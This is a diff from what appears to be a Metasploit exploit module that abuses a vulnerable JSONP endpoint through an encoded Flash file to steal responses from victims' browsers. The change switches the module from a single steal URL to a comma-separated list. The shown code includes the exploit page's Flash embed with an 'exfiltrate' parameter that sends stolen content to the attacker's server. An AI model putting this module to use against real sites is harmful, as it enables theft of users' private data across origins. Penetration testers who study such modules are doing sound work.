@@ -22,12 +22,12 @@ def initialize(info = {})
22
22
23
23
This module spins up a web server that, upon navigation from a user, attempts
24
24
to abuse the specified JSONP endpoint URLs by stealing the response from
25
- GET requests to STEAL_URL .
25
+ GET requests to STEAL_URLS .
26
26
} ,
27
27
'License' => MSF_LICENSE ,
28
28
'Author' => [
29
- 'Michele Spagnuolo' ,
30
- 'joev'
29
+ 'Michele Spagnuolo' , # discovery, wrote rosetta encoder, disclosure
30
+ 'joev' # msf module
31
31
] ,
32
32
'References' =>
33
33
[
@@ -45,9 +45,8 @@ def initialize(info = {})
45
45
[
46
46
OptString . new ( 'CALLBACK' , [ true , 'The name of the callback paramater' , 'callback' ] ) ,
47
47
OptString . new ( 'JSONP_URL' , [ true , 'The URL of the vulnerable JSONP endpoint' , '' ] ) ,
48
- OptString . new ( 'STEAL_URL' , [ true , 'The URL to steal the contents of' , '' ] ) ,
49
48
OptBool . new ( 'CHECK' , [ true , 'Check first that the JSONP endpoint works' , true ] ) ,
50
- OptString . new ( 'STEAL_URL ' , [ true , 'The URL to steal the contents of ' , '' ] ) ,
49
+ OptString . new ( 'STEAL_URLS ' , [ true , 'A comma-separated list of URLs to steal ' , '' ] ) ,
51
50
OptString . new ( 'URIPATH' , [ true , 'The URI path to serve the exploit under' , '/' ] )
52
51
] ,
53
52
self . class )
@@ -113,7 +112,7 @@ def exploit_html
113
112
<object type="application/x-shockwave-flash" data="#{ exploit_url ( encoded_swf ) } "
114
113
width=500 height=500>
115
114
<param name="FlashVars"
116
- value="url=#{ URI . escape datastore [ 'STEAL_URL ' ] } &exfiltrate=#{ ex_url } " />
115
+ value="url=#{ URI . escape datastore [ 'STEAL_URLS ' ] } &exfiltrate=#{ ex_url } " />
117
116
</object>
118
117
</body>
119
118
</html>
0 commit comments